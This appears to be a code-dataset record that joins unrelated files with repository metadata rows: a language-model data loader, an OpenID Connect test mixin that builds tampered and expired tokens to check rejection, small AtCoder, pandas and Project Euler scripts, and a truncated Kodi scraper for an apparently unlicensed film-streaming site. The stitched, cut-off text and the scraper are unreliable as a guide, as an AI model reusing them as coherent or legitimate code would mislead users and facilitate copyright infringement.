collate_fn = None
if block_collate:
collate_fn = ConstructBlockStrategy(args, tokenizer, args.seq_length, bert_prob=args.bert_prob,
gap_sentence_prob=args.gap_sentence_prob,
gap_sentence_ratio=args.gap_sentence_ratio,
gpt_infill_prob=args.gpt_infill_prob,
average_block_length=args.avg_block_length,
gpt_min_ratio=args.gpt_min_ratio,
block_mask_prob=args.block_mask_prob,
context_mask_ratio=args.context_mask_ratio,
short_seq_prob=args.short_seq_prob,
single_span_prob=args.single_span_prob,
shuffle_blocks=not args.no_shuffle_block,
block_position_encoding=not args.no_block_position,
sentinel_token=args.sentinel_token,
encoder_decoder=args.encoder_decoder,
task_mask=args.task_mask, random_position=args.random_position,
masked_lm=args.masked_lm).construct_blocks
data_loader = torch.utils.data.DataLoader(dataset,
batch_sampler=batch_sampler,
num_workers=args.num_workers,
pin_memory=True,
collate_fn=collate_fn)
return data_loader
def make_tfrecord_loaders(args):
"""Load train/val/test dataset from shuffled TFRecords"""
import data_utils.tf_dl
data_set_args = {'batch_size': args.batch_size,
'max_seq_len': args.seq_length,
'max_preds_per_seq': args.max_preds_per_seq,
'train': True,
'num_workers': max(args.num_workers, 1),
'seed': args.seed + args.rank + 1,
'threaded_dl': args.num_workers > 0
}
train = data_utils.tf_dl.TFRecordDataLoader(args.train_data,
**data_set_args)
data_set_args['train'] = False
if args.eval_seq_length is not None:
data_set_args['max_seq_len'] = args.eval_seq_length
if args.eval_max_preds_per_seq is not None:
data_set_args['max_preds_per_seq'] = args.eval_max_preds_per_seq
valid = None
if args.valid_data is not None:
valid = data_utils.tf_dl.TFRecordDataLoader(args.valid_data,
**data_set_args)
test = None
if args.test_data is not None:
test = data_utils.tf_dl.TFRecordDataLoader(args.test_data,
**data_set_args)
tokenizer = data_utils.make_tokenizer(args.tokenizer_type,
train,
args.tokenizer_path,
args.vocab_size,
args.tokenizer_model_type,
cache_dir=args.cache_dir)
return (train, valid, test), tokenizer
def make_loaders(args, tokenizer):
"""makes training/val/test"""
if args.use_tfrecords:
return make_tfrecord_loaders(args)
world_size = torch.distributed.get_world_size(group=mpu.get_data_parallel_group())
if args.loader_scatter is not None:
assert world_size % args.loader_scatter == 0
batch_size = args.batch_size * world_size
eval_batch_size = batch_size
if args.eval_batch_size is not None:
eval_batch_size = args.eval_batch_size * world_size
seq_length = args.seq_length
if seq_length < 0:
seq_length = seq_length * world_size
eval_seq_length = args.eval_seq_length
if eval_seq_length is not None and eval_seq_length < 0:
eval_seq_length = eval_seq_length * world_size
split = get_split(args)
data_set_args = {
'path': args.train_data,
'seq_length': seq_length,
'mem_length': args.mem_length,
'delim': args.delim,
'text_key': args.text_key,
'label_key': 'label',
'ds_type': args.data_set_type,
'split': split,
'loose': args.loose_json,
'max_preds_per_seq': args.max_preds_per_seq,
'presplit_sentences': args.presplit_sentences,
'sample_one_document': args.sample_one_document,
'filter_english': args.filter_english,
'pre_tokenize': not args.no_pre_tokenize,
'tokenizer': tokenizer,
'save_splits': args.save_splits,
'load_splits': args.load_splits,
'save_test_data': args.save_test_data,
'no_lazy_loader': args.no_lazy_loader,
'loader_scatter': args.loader_scatter,
'data_parallel_rank': mpu.get_data_parallel_rank(),
"non_sentence_start": args.non_sentence_start,
"half_lazy_loader": args.half_lazy_loader
}
eval_set_args = copy.copy(data_set_args)
eval_set_args['split'] = [1.]
# if optional eval args were set then replace their
# equivalent values in the arg dict
if eval_seq_length:
eval_set_args['seq_length'] = eval_seq_length
if args.eval_max_preds_per_seq:
eval_set_args['max_preds_per_seq'] = args.eval_max_preds_per_seq
if args.eval_text_key is not None:
eval_set_args['text_key'] = args.eval_text_key
# make datasets splits and tokenizer
train, valid, test = None, None, None
if args.train_data is not None:
train = data_utils.make_dataset(**data_set_args)
if data_utils.should_split(split):
train, valid, test = train
eval_set_args['tokenizer'] = tokenizer
# make training and val dataset if necessary
if valid is None and args.valid_data is not None:
eval_set_args['path'] = args.valid_data
valid = data_utils.make_dataset(**eval_set_args)
eval_set_args['tokenizer'] = tokenizer
if test is None and args.test_data is not None:
eval_set_args['path'] = args.test_data
test = data_utils.make_dataset(**eval_set_args)
# wrap datasets with data loader
use_block = args.block_lm or args.encoder_decoder
if train is not None and args.batch_size > 0:
train = make_data_loader(train, tokenizer, batch_size, args.train_iters, args, shuffle=args.shuffle,
block_collate=use_block)
args.do_train = True
else:
args.do_train = False
eval_batch_size = eval_batch_size if eval_batch_size != 0 else batch_size
if valid is not None:
valid = make_data_loader(valid, tokenizer, eval_batch_size, args.train_iters, args, shuffle=args.shuffle,
block_collate=use_block)
args.do_valid = True
else:
args.do_valid = False
if test is not None:
test = make_data_loader(test, tokenizer, eval_batch_size, len(test) // eval_batch_size + 1, args,
shuffle=args.shuffle, block_collate=use_block)
args.do_test = True
else:
args.do_test = False
return train, valid, test
def build_multi_task_dataset(args, tokenizer):
task_dirs = {"mnli": "MNLI", "cola": "CoLA", "mrpc": "MRPC", "qnli": "QNLI", "qqp": "QQP", "sst2": "SST-2",
"agnews": "Agnews", "yelp-polarity": "yelp_review_polarity_csv", "yelp-full": "yelp_review_full_csv",
"yahoo": "Yahoo", "squad": "SQuAD", "race": "RACE"}
train, valid = None, None
if mpu.get_model_parallel_rank() == 0:
multi_seq_length = args.seq_length
if args.multi_seq_length is not None:
multi_seq_length = args.multi_seq_length
train_datasets, valid_datasets = [], []
for task in args.multi_task_data:
task = task.lower()
data_dir = os.path.join(args.data_dir, task_dirs[task])
train_datasets.append(
SuperGlueDataset(args, task, data_dir, multi_seq_length, "train", tokenizer, pattern_ensemble=True))
valid_datasets.append(
SuperGlueDataset(args, task, data_dir, multi_seq_length, "dev", tokenizer, pattern_ensemble=True))
train = MultiTaskDataset(args.multi_task_data, train_datasets)
valid = MultiTaskDataset(args.multi_task_data, valid_datasets)
world_size = torch.distributed.get_world_size(group=mpu.get_data_parallel_group())
multi_batch_size = args.batch_size * world_size
if args.multi_batch_size is not None:
multi_batch_size = args.multi_batch_size * world_size
train = make_data_loader(train, tokenizer, multi_batch_size, args.train_iters, args, shuffle=True)
valid = make_data_loader(valid, tokenizer, multi_batch_size, args.train_iters, args, shuffle=True)
return train, valid
def get_split(args):
"""
Get dataset splits from comma separated string list
"""
splits = []
if args.split.find(',') != -1:
splits = [float(s) for s in args.split.split(',')]
elif args.split.find('/') != -1:
splits = [float(s) for s in args.split.split('/')]
else:
splits = [float(args.split)]
split_total = sum(splits)
if split_total < 1.:
splits.append(1 - split_total)
while len(splits) < 3:
splits.append(0.)
splits = splits[:3]
if args.valid_data is not None:
splits[1] = 0.
if args.test_data is not None:
splits[2] = 0.
final_sum = sum(splits)
return [s / final_sum for s in splits]
def configure_data():
"""add cmdline flags for configuring datasets"""
# These are options that are used by data_utils, but are either
# deprecated or not meant to be exposed to the command line user.
# These options are intended to be set in code by specific scripts.
defaults = {
'world_size': 1,
'rank': -1,
'persist_state': 0,
'lazy': False,
'transpose': False,
'data_set_type': 'supervised',
'seq_length': 256,
'eval_seq_length': 256,
'samples_per_shard': 100
}
return DataConfig(defaults=defaults)
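The `MultiTaskDataset` above samples tasks with temperature-scaled weights, each weight proportional to `min(len, max_limit) ** temperature`, which up-weights small tasks relative to their raw share of the data. A standalone illustration with made-up task sizes (the sizes are hypothetical, not taken from the training data):

```python
# Hedged illustration of the temperature-based task reweighting.
import numpy as np

lens = [392_702, 8_551, 3_668]            # hypothetical task sizes
temperature, max_limit = 0.8, 200_000     # defaults used by MultiTaskDataset

weights = np.array([min(l, max_limit) ** temperature for l in lens], dtype=float)
weights /= weights.sum()
print(weights.round(3))                   # roughly [0.892, 0.072, 0.036]
```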
| [
"[email protected]"
] | |
42db9ae5b41d878484401904355a985bab0c7f8d | f998a574343292d050777f616b408a74fde05738 | /eshop_docker/eshop/extra_apps/social_core/tests/backends/open_id_connect.py | 25e6b5db9900819e073facd14c2e6cdb9f222ebc | [] | no_license | Boomshakal/Django | 7987e0572fc902bd56360affea0b5087a4cb04a7 | a149691c472eab3440028bf2460cd992acec0f8a | refs/heads/master | 2023-01-11T06:16:29.283428 | 2022-12-23T08:00:05 | 2022-12-23T08:00:05 | 199,360,433 | 0 | 0 | null | 2020-06-06T09:37:02 | 2019-07-29T02:01:09 | Python | UTF-8 | Python | false | false | 6,334 | py | # -*- coding: utf-8 -*-
from calendar import timegm
import os
import sys
import json
import datetime
import unittest2
try:
from jwkest.jwk import RSAKey, KEYS
from jwkest.jws import JWS
from jwkest.jwt import b64encode_item
NO_JWKEST = False
except ImportError:
NO_JWKEST = True
from httpretty import HTTPretty
sys.path.insert(0, '..')
from ...exceptions import AuthTokenError
class OpenIdConnectTestMixin(object):
"""
Mixin to test OpenID Connect consumers. Inheriting classes should also
inherit OAuth2Test.
"""
client_key = 'a-key'
client_secret = 'a-secret-key'
issuer = None # id_token issuer
openid_config_body = None
key = None
def setUp(self):
super(OpenIdConnectTestMixin, self).setUp()
test_root = os.path.dirname(os.path.dirname(__file__))
self.key = RSAKey(kid='testkey').load(os.path.join(test_root, 'testkey.pem'))
HTTPretty.register_uri(HTTPretty.GET,
self.backend.OIDC_ENDPOINT + '/.well-known/openid-configuration',
status=200,
body=self.openid_config_body
)
oidc_config = json.loads(self.openid_config_body)
def jwks(_request, _uri, headers):
ks = KEYS()
ks.add(self.key.serialize())
return 200, headers, ks.dump_jwks()
HTTPretty.register_uri(HTTPretty.GET,
oidc_config.get('jwks_uri'),
status=200,
body=jwks)
def extra_settings(self):
settings = super(OpenIdConnectTestMixin, self).extra_settings()
settings.update({
'SOCIAL_AUTH_{0}_KEY'.format(self.name): self.client_key,
'SOCIAL_AUTH_{0}_SECRET'.format(self.name): self.client_secret,
'SOCIAL_AUTH_{0}_ID_TOKEN_DECRYPTION_KEY'.format(self.name):
self.client_secret
})
return settings
def access_token_body(self, request, _url, headers):
"""
Get the nonce from the request parameters, add it to the id_token, and
return the complete response.
"""
nonce = self.backend.data['nonce'].encode('utf-8')
body = self.prepare_access_token_body(nonce=nonce)
return 200, headers, body
def get_id_token(self, client_key=None, expiration_datetime=None,
issue_datetime=None, nonce=None, issuer=None):
"""
Return the id_token to be added to the access token body.
"""
return {
'iss': issuer,
'nonce': nonce,
'aud': client_key,
'azp': client_key,
'exp': expiration_datetime,
'iat': issue_datetime,
'sub': '1234'
}
def prepare_access_token_body(self, client_key=None, tamper_message=False,
expiration_datetime=None,
issue_datetime=None, nonce=None,
issuer=None):
"""
Prepares a provider access token response. Arguments:
client_key -- (str) OAuth key/ID for the client that requested
authentication.
expiration_datetime -- (datetime) Date and time after which the response
should be considered invalid.
"""
body = {'access_token': 'foobar', 'token_type': 'bearer'}
client_key = client_key or self.client_key
now = datetime.datetime.utcnow()
expiration_datetime = expiration_datetime or \
(now + datetime.timedelta(seconds=30))
issue_datetime = issue_datetime or now
nonce = nonce or 'a-nonce'
issuer = issuer or self.issuer
id_token = self.get_id_token(
client_key, timegm(expiration_datetime.utctimetuple()),
timegm(issue_datetime.utctimetuple()), nonce, issuer)
body['id_token'] = JWS(id_token, jwk=self.key, alg='RS256').sign_compact()
if tamper_message:
header, msg, sig = body['id_token'].split('.')
id_token['sub'] = '1235'
msg = b64encode_item(id_token).decode('utf-8')
body['id_token'] = '.'.join([header, msg, sig])
return json.dumps(body)
def authtoken_raised(self, expected_message, **access_token_kwargs):
self.access_token_body = self.prepare_access_token_body(
**access_token_kwargs
)
with self.assertRaisesRegexp(AuthTokenError, expected_message):
self.do_login()
@unittest2.skipIf(NO_JWKEST, 'No Jwkest installed')
def test_invalid_signature(self):
self.authtoken_raised(
'Token error: Signature verification failed',
tamper_message=True
)
@unittest2.skipIf(NO_JWKEST, 'No Jwkest installed')
def test_expired_signature(self):
expiration_datetime = datetime.datetime.utcnow() - \
datetime.timedelta(seconds=30)
self.authtoken_raised('Token error: Signature has expired',
expiration_datetime=expiration_datetime)
@unittest2.skipIf(NO_JWKEST, 'No Jwkest installed')
def test_invalid_issuer(self):
self.authtoken_raised('Token error: Invalid issuer',
issuer='someone-else')
@unittest2.skipIf(NO_JWKEST, 'No Jwkest installed')
def test_invalid_audience(self):
self.authtoken_raised('Token error: Invalid audience',
client_key='someone-else')
@unittest2.skipIf(NO_JWKEST, 'No Jwkest installed')
def test_invalid_issue_time(self):
expiration_datetime = datetime.datetime.utcnow() - \
datetime.timedelta(hours=1)
self.authtoken_raised('Token error: Incorrect id_token: iat',
issue_datetime=expiration_datetime)
@unittest2.skipIf(NO_JWKEST, 'No Jwkest installed')
def test_invalid_nonce(self):
self.authtoken_raised(
'Token error: Incorrect id_token: nonce',
nonce='something-wrong'
)
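A concrete provider test would mix this class into `OAuth2Test` and supply an issuer plus a canned discovery document. The backend path and endpoint URLs below are illustrative placeholders, not a real provider:

```python
# Hedged sketch of a test case built on OpenIdConnectTestMixin.
import json

from .oauth import OAuth2Test  # base OAuth2 test case used by sibling modules


class ExampleOpenIdConnectTest(OpenIdConnectTestMixin, OAuth2Test):
    backend_path = 'social_core.backends.example.ExampleOpenIdConnect'  # placeholder
    issuer = 'https://example.com'
    openid_config_body = json.dumps({
        'issuer': 'https://example.com',
        'authorization_endpoint': 'https://example.com/oauth2/authorize',
        'token_endpoint': 'https://example.com/oauth2/token',
        'jwks_uri': 'https://example.com/oauth2/jwks',
    })

    def test_login(self):
        self.do_login()
```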
| [
"[email protected]"
] | |
f82fa05a647d060994f1394b769def3f788dcc39 | 0eaf0d3f0e96a839f2ef37b92d4db5eddf4b5e02 | /abc274/b.py | 1f18cd915d905546bb897ac0c9a184c714fb9018 | [] | no_license | silphire/atcoder | b7b02798a87048757745d99e8564397d1ca20169 | f214ef92f13bc5d6b290746d5a94e2faad20d8b0 | refs/heads/master | 2023-09-03T17:56:30.885166 | 2023-09-02T14:16:24 | 2023-09-02T14:16:24 | 245,110,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | h, w = map(int, input().split())
cc = [
input().rstrip()
for _ in range(h)
]
xx = [0] * w
for x in range(w):
for y in range(h):
if cc[y][x] == '#':
xx[x] += 1
print(*xx) | [
"[email protected]"
] | |
325eb1dbf06a23dc59d7f10da7867ee273d97c26 | 0cbc02dd7d1efbe61de04dcf1c6eccb6496bf074 | /month05/teacher/day02/demo03_dataframe.py | f25546461a98a1a27fa428c2ff04b2b73a91f7a7 | [] | no_license | fsym-fs/Python_AID | 0b1755c15e20b214940041e81bedb2d5ec99e3f9 | f806bb02cdb1670cfbea6e57846abddf3972b73b | refs/heads/master | 2021-03-20T06:57:45.441245 | 2020-05-27T14:13:45 | 2020-05-27T14:13:45 | 247,187,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,871 | py | """
demo03_dataFrame.py
"""
import pandas as pd
import numpy as np
df = pd.DataFrame()
print(df)
# Create a DataFrame from a list
data = ['王伟超', '王小超', '王大超', '王年轻超']
df = pd.DataFrame(data)
print(df)
data = [['Alex',10],['Bob',12],['Clarke',13]]
df = pd.DataFrame(data, index=['S01', 'S02', 'S03'], columns=['Name', 'Age'])
print(df)
data = [{'a': 1, 'b': 2},{'a': 5, 'b': 10, 'c': 20}]
df = pd.DataFrame(data)
print(df)
# Create a DataFrame from a dict
data = {'Name':['Tom', 'Jack', 'Steve', 'Ricky'],'Age':[28,34,29,42]}
df = pd.DataFrame(data)
print(df)
print(df.axes)
print(df.index)
print(df.columns)
print(df.values)
print(df.head(2))
print(df.tail(2))
# Column access
print('-' * 50)
d = {'one' : pd.Series([1, 2, 3], index=['a', 'b', 'c']),
'two' : pd.Series([1, 2, 3, 4], index=['a', 'b', 'c', 'd']),
'three' : pd.Series([1, 3, 4], index=['a', 'c', 'd'])}
df = pd.DataFrame(d)
print(df['one']) # access the 'one' column
print(df[['one', 'three']])
print(df[df.columns[:2]])
# Add a column
print('-' * 50)
# df['four'] = pd.Series([1, 2, 3, 4], index=['a', 'b', 'c', 'd'])
# df['four'] = pd.Series([1, 2, 3, 4])
# df['four'] = [1, 2, 3, 4]
# df['four'] = [1, 2, 3]
df['four'] = pd.Series([1, 2, 3], index=['b', 'c', 'd'])
print(df)
# Delete a column
# print('-' * 50)
# del(df['four'])
# df.pop('one')
# df2 = df.drop(['one', 'three'], axis=1)
# print(df2)
# Row access
print('-' * 50)
print(df.loc['a'])
print(df.loc[['a', 'b']])
print(df.loc['a':'c']) # label slice is inclusive; the result contains a, b and c
print(df.iloc[[0, 2]])
print(df.iloc[0:2]) # positional slice; the result contains a and b
# Add a row
print('-' * 50)
print(df)
newline = pd.Series([2.2, 3.1, 4.5, 3.2], index=['one', 'two', 'three', 'four'], name='e')
df = df.append(newline)
print(df)
df = df.append(df)
print(df)
# The index now contains duplicates, so rebuild it
df.index = np.arange(10)
print(df)
# Delete rows
df = df.drop(np.arange(4, 10))
print(df)
# Accessing individual DataFrame elements
print(df.loc[2]['four'])
print(df.loc[2, 'four'])
print(df['four'][2])
print(df.loc[2:2].loc[2, 'four'])
# Hierarchical (multi-level) index
# random.normal() returns normally distributed random numbers, shape (6, 3), mean 85, standard deviation 3
data = np.floor(np.random.normal(85, 3, (6,3)))
df = pd.DataFrame(data)
print('-' * 50)
print(df)
# Change the row index to a MultiIndex
mindex = [('classA', 'F'), ('classA', 'M'),
('classB', 'F'), ('classB', 'M'),
('classC', 'F'), ('classC', 'M')]
df.index = pd.MultiIndex.from_tuples(mindex)
# Change the column index to a MultiIndex
mindex = [('Age', '20+'), ('Age', '25+'), ('Age', '30+')]
df.columns = pd.MultiIndex.from_tuples(mindex)
print(df)
# Access elements through the MultiIndex
print(df.loc['classA', 'F']['Age'])
print(df['Age', '30+']) | [
"[email protected]"
] | |
c02b81dbf0c54de6a19bd9b9039bd4f20831c548 | f435b177d625e50bb9beafb191e1df01e3cb30ee | /src/pyoiler/problems/euler015.py | c9d24f4b6a0d172559219d2b5607eca2cbc11049 | [] | no_license | bathcat/pyOiler | dcf948b0a18a9094314564d177c7827c875de78b | 3ce4d96277e61346509c2975a0034fb5ba845f23 | refs/heads/main | 2023-03-12T10:42:48.837126 | 2021-02-10T19:18:14 | 2021-02-10T19:18:14 | 337,828,844 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,357 | py | from typing import Iterable, Tuple
from ..shared.more_itertools import flat_map, count
from ..shared.solver import Solver
"""[summary]
2 thoughts on performance:
1. This *enumerates* paths, which isn't necessary.
All we need to do is count them, so just increment
a number when you get to 16,16, and forget about
holding on to the tail.
2. Adding threads should be trivial, especially
after changing the search to depth-first.
Returns:
[type]: [description]
Yields:
[type]: [description]
"""
Position = Tuple[int,int]
class Path():
head:Position
tail: 'Path'
def __init__(self, end:Position, rest:'Path' = None):
self.head = end
self.tail = rest
def to_positions(self) -> Iterable[Position]:
yield self.head
if self.tail:
yield from self.tail.to_positions()
def append(self, p:Position) -> 'Path':
return Path(p, self)
def __str__(self):
ps = list(self.to_positions())
ps.reverse()
return str(ps)
@classmethod
def zero(cls) -> 'Path':
return Path((0,0))
class Lattice():
height:int
width:int
def __init__(self,width, height):
self.width=width
self.height=height
def successor_paths(self, current:Path) -> Iterable[Path]:
if current.head[0] < self.width:
yield current.append((current.head[0] + 1, current.head[1]))
if current.head[1] < self.height:
yield current.append((current.head[0], current.head[1] + 1))
def paths(self) -> Iterable[Path]:
partials = [Path.zero()]
for _ in range(self.height + self.width):
partials = flat_map(self.successor_paths, partials)
return partials
def _solve(print = print):
side = 15
l = Lattice(side,side)
path_count = count(l.paths())
print(f"Count of paths through a {side} lattice is: {path_count}")
print("This approach doesn't scale.")
return False
description = '''Starting in the top left corner of a 2×2 grid, and only being able to move to the right and down,
there are exactly 6 routes to the bottom right corner.
How many such routes are there through a 20×20 grid?
'''
solver = Solver(15,
'Lattice paths',
description,
_solve
)
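As the module docstring notes, enumerating paths does not scale; the count is available directly as a binomial coefficient. A small sketch of that closed form (not part of the original solver):

```python
# Closed-form count: an n x n lattice has C(2n, n) monotone paths.
from math import comb

print(comb(30, 15))  # 155117520 paths for the 15x15 lattice used by _solve
print(comb(40, 20))  # 137846528820 paths for the 20x20 grid in the problem
```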
| [
"[email protected]"
] | |
0f65babd63124bdd8131d36882d73b9b9ea8f77e | ad59fb12042bfd3f5c43eca057d0f747f9e148cf | /Se2iP/usr/lib/enigma2/python/Plugins/Extensions/IPTVPlayer/tsiplayer/addons/resources/sites/enstream.py | ebd1c92b5ec4b69402b4e26a91e58348b7cf1fb3 | [] | no_license | lexlong2007/eePlugins | d62b787100a7069ad5713a47c5688008063b45ec | 167b262fe36901a2d3a2fae6d0f85e2307b3eff7 | refs/heads/master | 2022-03-09T05:37:37.567937 | 2022-02-27T01:44:25 | 2022-02-27T01:44:25 | 253,012,126 | 0 | 0 | null | 2020-04-04T14:03:29 | 2020-04-04T14:03:29 | null | UTF-8 | Python | false | false | 13,438 | py | # -*- coding: utf-8 -*-
# vStream https://github.com/Kodi-vStream/venom-xbmc-addons
import re
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib import xbmc
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib.gui.hoster import cHosterGui
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib.gui.gui import cGui
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib.handler.inputParameterHandler import cInputParameterHandler
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib.handler.outputParameterHandler import cOutputParameterHandler
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib.handler.requestHandler import cRequestHandler
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib.parser import cParser
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib.util import Unquote
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib.comaddon import progress
SITE_IDENTIFIER = 'enstream'
SITE_NAME = 'Enstream'
SITE_DESC = 'Regarder tous vos films streaming complets, gratuit et illimité'
URL_MAIN = 'https://www.enstream.club/'
FUNCTION_SEARCH = 'showMovies'
URL_SEARCH = ('', FUNCTION_SEARCH)
URL_SEARCH_MOVIES = (URL_SEARCH[0], FUNCTION_SEARCH)
MOVIE_MOVIE = (True, 'load')
MOVIE_NEWS = (URL_MAIN + 'films-streaming/', 'showMovies')
MOVIE_GENRES = (True, 'showGenres')
MOVIE_ANNEES = (True, 'showYears')
MOVIE_LIST = (True, 'showAlpha')
def load():
oGui = cGui()
oOutputParameterHandler = cOutputParameterHandler()
oOutputParameterHandler.addParameter('siteUrl', URL_SEARCH[0])
oGui.addDir(SITE_IDENTIFIER, 'showSearch', 'Recherche', 'search.png', oOutputParameterHandler)
oOutputParameterHandler.addParameter('siteUrl', MOVIE_NEWS[0])
oGui.addDir(SITE_IDENTIFIER, MOVIE_NEWS[1], 'Films (Derniers ajouts)', 'news.png', oOutputParameterHandler)
oOutputParameterHandler.addParameter('siteUrl', MOVIE_GENRES[0])
oGui.addDir(SITE_IDENTIFIER, MOVIE_GENRES[1], 'Films (Genres)', 'genres.png', oOutputParameterHandler)
oOutputParameterHandler.addParameter('siteUrl', MOVIE_ANNEES[0])
oGui.addDir(SITE_IDENTIFIER, MOVIE_ANNEES[1], 'Films (Par années)', 'annees.png', oOutputParameterHandler)
oOutputParameterHandler.addParameter('siteUrl', MOVIE_LIST[0])
oGui.addDir(SITE_IDENTIFIER, MOVIE_LIST[1], 'Films (Ordre alphabétique)', 'listes.png', oOutputParameterHandler)
oGui.setEndOfDirectory()
def showSearch():
oGui = cGui()
sSearchText = oGui.showKeyBoard()
if (sSearchText != False):
showMovies(sSearchText)
oGui.setEndOfDirectory()
return
def showGenres():
oGui = cGui()
liste = []
liste.append(['Action', URL_MAIN + 'genre/action/'])
liste.append(['Animation', URL_MAIN + 'genre/animation/'])
liste.append(['Aventure', URL_MAIN + 'genre/aventure/'])
liste.append(['Biopic', URL_MAIN + 'genre/biopic/'])
liste.append(['Comédie', URL_MAIN + 'genre/comedie/'])
liste.append(['Comédie Dramatique', URL_MAIN + 'genre/comedie-dramatique/'])
liste.append(['Comédie Musicale', URL_MAIN + 'genre/comedie-musical/'])
liste.append(['Drame', URL_MAIN + 'genre/drame/'])
liste.append(['Epouvante Horreur', URL_MAIN + 'genre/epouvante-horreur/'])
liste.append(['Espionnage', URL_MAIN + 'genre/espionnage/'])
liste.append(['Famille', URL_MAIN + 'genre/famille/'])
liste.append(['Fantastique', URL_MAIN + 'genre/fantastique/'])
liste.append(['Guerre', URL_MAIN + 'genre/guerre/'])
liste.append(['Historique', URL_MAIN + 'genre/historique/'])
liste.append(['Judiciaire', URL_MAIN + 'genre/judiciaire/'])
liste.append(['Musical', URL_MAIN + 'genre/musical/'])
liste.append(['Péplum', URL_MAIN + 'genre/peplum/'])
liste.append(['Policier', URL_MAIN + 'genre/policier/'])
liste.append(['Romance', URL_MAIN + 'genre/romance/'])
liste.append(['Science Fiction', URL_MAIN + 'genre/science-fiction/'])
liste.append(['Thriller', URL_MAIN + 'genre/thriller/'])
liste.append(['Western', URL_MAIN + 'genre/western/'])
oOutputParameterHandler = cOutputParameterHandler()
for sTitle, sUrl in liste:
oOutputParameterHandler.addParameter('siteUrl', sUrl)
oGui.addDir(SITE_IDENTIFIER, 'showMovies', sTitle, 'genres.png', oOutputParameterHandler)
oGui.setEndOfDirectory()
def showYears():
oGui = cGui()
oOutputParameterHandler = cOutputParameterHandler()
for i in reversed(range(1942, 2022)):
Year = str(i)
oOutputParameterHandler.addParameter('siteUrl', URL_MAIN + 'Annee/' + Year)
oGui.addDir(SITE_IDENTIFIER, 'showMovies', Year, 'annees.png', oOutputParameterHandler)
oGui.setEndOfDirectory()
def showAlpha():
oGui = cGui()
sUrl = URL_MAIN + 'ABC/'
liste = [['0-9', sUrl], ['A', sUrl + 'A'], ['B', sUrl + 'B'], ['C', sUrl + 'C'], ['D', sUrl + 'D'],
['E', sUrl + 'E'], ['F', sUrl + 'F'], ['G', sUrl + 'G'], ['H', sUrl + 'H'], ['I', sUrl + 'I'],
['J', sUrl + 'J'], ['K', sUrl + 'K'], ['L', sUrl + 'L'], ['M', sUrl + 'M'], ['N', sUrl + 'N'],
['O', sUrl + 'O'], ['P', sUrl + 'P'], ['Q', sUrl + 'Q'], ['R', sUrl + 'R'], ['S', sUrl + 'S'],
['T', sUrl + 'T'], ['U', sUrl + 'U'], ['V', sUrl + 'V'], ['W', sUrl + 'W'], ['X', sUrl + 'X'],
['Y', sUrl + 'Y'], ['Z', sUrl + 'Z']]
oOutputParameterHandler = cOutputParameterHandler()
for sTitle, sUrl in liste:
oOutputParameterHandler.addParameter('siteUrl', sUrl)
oGui.addDir(SITE_IDENTIFIER, 'showMovies', 'Lettre [COLOR coral]' + sTitle + '[/COLOR]', 'listes.png', oOutputParameterHandler)
oGui.setEndOfDirectory()
def showMovies(sSearch=''):
oGui = cGui()
if sSearch:
sUrl = URL_MAIN + 'search.php'
oRequestHandler = cRequestHandler(sUrl)
oRequestHandler.setRequestType(cRequestHandler.REQUEST_TYPE_POST)
oRequestHandler.addParameters('q', Unquote(sSearch))
else:
oInputParameterHandler = cInputParameterHandler()
sUrl = oInputParameterHandler.getValue('siteUrl')
oRequestHandler = cRequestHandler(sUrl)
oRequestHandler.addHeaderEntry('Referer', URL_MAIN)
sHtmlContent = oRequestHandler.request()
if sSearch:
sPattern = '<a href="([^"]+).+?url\((.+?)\).+?<div class="title"> (.+?) </div>'
elif 'Annee/' in sUrl or '/ABC' in sUrl:
sPattern = '<div class="table-movies-content.+?href="([^"]+).+?url\((.+?)\).+?<.i>.([^<]+)'
elif 'genre/' in sUrl:
sPattern = 'film-uno.+?href="([^"]+).+?data-src="([^"]+).+?alt="([^"]+)'
else:
sPattern = 'class="film-uno".+?href="([^"]+).+?data-src="([^"]+).+?alt="([^"]+).+?min.+?·([^<]+).+?short-story">([^<]*)'
oParser = cParser()
aResult = oParser.parse(sHtmlContent, sPattern)
if (aResult[0] == False):
oGui.addText(SITE_IDENTIFIER)
if (aResult[0] == True):
total = len(aResult[1])
progress_ = progress().VScreate(SITE_NAME)
oOutputParameterHandler = cOutputParameterHandler()
for aEntry in aResult[1]:
progress_.VSupdate(progress_, total)
if progress_.iscanceled():
break
sUrl = aEntry[0]
sThumb = aEntry[1]
sTitle = aEntry[2]
sDesc = ''
if len(aEntry) > 3:
if xbmc.getInfoLabel('system.buildversion')[0:2] >= '19':
sQual = aEntry[3].split('·')[1].replace('Â', '').strip()
sLang = aEntry[3].split('·')[2].strip()
else:
sQual = aEntry[3].split('·')[1].strip()
sLang = aEntry[3].split('·')[2].strip()
sDesc = aEntry[4]
sDisplayTitle = ('%s [%s] (%s)') % (sTitle, sQual, sLang)
else:
sDisplayTitle = sTitle
oOutputParameterHandler.addParameter('siteUrl', sUrl)
oOutputParameterHandler.addParameter('sMovieTitle', sTitle)
oOutputParameterHandler.addParameter('sThumb', sThumb)
oOutputParameterHandler.addParameter('sDesc', sDesc)
oGui.addMovie(SITE_IDENTIFIER, 'showHoster', sDisplayTitle, '', sThumb, sDesc, oOutputParameterHandler)
progress_.VSclose(progress_)
if not sSearch:
sNextPage, sPaging = __checkForNextPage(sHtmlContent)
if (sNextPage != False):
oOutputParameterHandler = cOutputParameterHandler()
oOutputParameterHandler.addParameter('siteUrl', sNextPage)
# sNumPage = re.search('(page|genre).*?[-=\/]([0-9]+)', sNextPage).group(2) # ou replace'.html',''; '([0-9]+)$'
oGui.addNext(SITE_IDENTIFIER, 'showMovies', 'Page ' + sPaging, oOutputParameterHandler)
oGui.setEndOfDirectory()
def __checkForNextPage(sHtmlContent):
oParser = cParser()
sPattern = 'class=\'Paginaactual\'.+?a href=\'([^"]+?)\'.+?>([^<]+)</a></li></ul'
aResult = oParser.parse(sHtmlContent, sPattern)
if (aResult[0] == True):
